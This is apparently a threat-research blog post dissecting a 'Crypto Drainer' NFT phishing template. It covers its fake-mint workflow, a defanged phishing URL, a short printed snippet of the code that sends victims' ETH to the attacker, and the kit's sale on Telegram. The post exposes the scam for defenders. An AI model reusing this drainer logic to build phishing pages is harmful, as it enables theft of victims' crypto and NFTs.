Our previous blog provided an overview of Web3 phishing techniques and tactics, all of which continue to be relevant despite a recent economic downturn in the crypto markets. Today, we offer a deeper dive into a specific category of Web3 phishing pages called “Crypto Drainers” and one of the more prolific actors behind them. We will see how one Crypto Drainer template was responsible for over 2,000 ETH in losses in a short period of time.

Crypto Drainers are phishing pages that lure victims into signing malicious transactions that allow the attacker to siphon their crypto and NFTs. Typically these websites piggyback off of well known or emerging NFT projects. The websites themselves are primarily promoted via spam campaigns on social networks and Discord.

The way most crypto drainers work is relatively straight forward:

• Fake NFT minting pages with an artificial countdown to create urgency.
• Victim connects their wallet to “mint”.
• Check if the victim address owns any valuable NFTs.
• Victim signs transaction(s) to transfer ownership of NFTs.
• Victim sends a transaction to the attacker for the cost of the fake “mint”, but this transaction is not a contract interaction.
• Rinse & repeat.

Let’s dig into a real example:

hxxps://pandaverse-mint.ml/

Here’s the real website for comparison:

When we look at the code under the hood of the malicious site, we find that the whole thing is templated and includes deployment instructions, but more on that later. For now, let’s take a peak at how this thing works.

First we have settings.js which acts as a config file. The comments are not ours, but part of the Crypto Drainer template.

And then we have index.js which includes the code responsible for the actual draining:

We won’t go over the code line by line, but it’s worth highlighting two sections in particular. First, there is this snippet from the spurious mint function, which just sends ETH from the victim to the attacker:

web3.eth.sendTransaction({
            from: walletAddress,
            to: address,
            value: web3.utils.toWei(amount, "ether"),
        })

Remember, minting an NFT is almost always a smart contract interaction, and requires invoking at least one function call. It typically requires additional orchestration beyond transfer of value to invoke a smart contract method, which is completely absent from the code above.

The second snippet we want to highlight is the askNfts() function in the code above:

Looks fishy doesn’t it? We can see how the attackers leverage the Moralis API in order to pull a record of the victim’s NFT ownership and cycle through them one at a time to siphon them off to a smart contract. Not to mention that pretty damning comment:

//this is a SMART CONTRACT address, don't replace or NFTs won't come :)

The role of the smart contract address here is not entirely clear as the source code is not verified and the bytecode analysis is outside of the scope of this post, furthermore this particular page hasn’t claimed any victims so there are no transactions to trace, but it’s noteworthy nonetheless seeing as we have examples of the same exact template moving NFTs to the attacker’s address directly and not an intermediate proxy contract.

In a few moments, we’ll see that we can’t take everything at face value in the world of Crypto Drainers, but for now we continue our investigation by trying out some OSINT searches to see what comes up. It’s clear as day that this is a recycled template that is likely being circulated around, so maybe we can find additional instances of it with a search on GitHub.

We do a search for askMint and come up with a treasure trove of hits:

We see that the same codebase has been employed by several dozen GitHub users and hosted on GitHub Pages:

Each instance targets a different NFT project as well. For example, the GitHub Page above is a fake METAKAMI mint:

Things start heating up as we continue digging through the search results and land on what looks to be the original repo:

Eureka!

But remember when we said that everything is not as it seems in the world of Crypto Drainers? Here’s where things get interesting:

Looks like the old adage “There’s no honor among thieves” holds true especially for cybercrime as we find a GitHub user calling out the first author we found above as a thief that sells backdoored Crypto Drainers!

We follow the link to a Crypto Drainers group on Telegram:

Here we find vendors selling these Crypto Drainer templates as a full service, with full support in English and French:

There’s a demo on YouTube by the way:

And an e-commerce link where you can buy these hosted templates with white-glove service:

Now anyone can be an NFT & crypto thief for the low cost of €1499.99!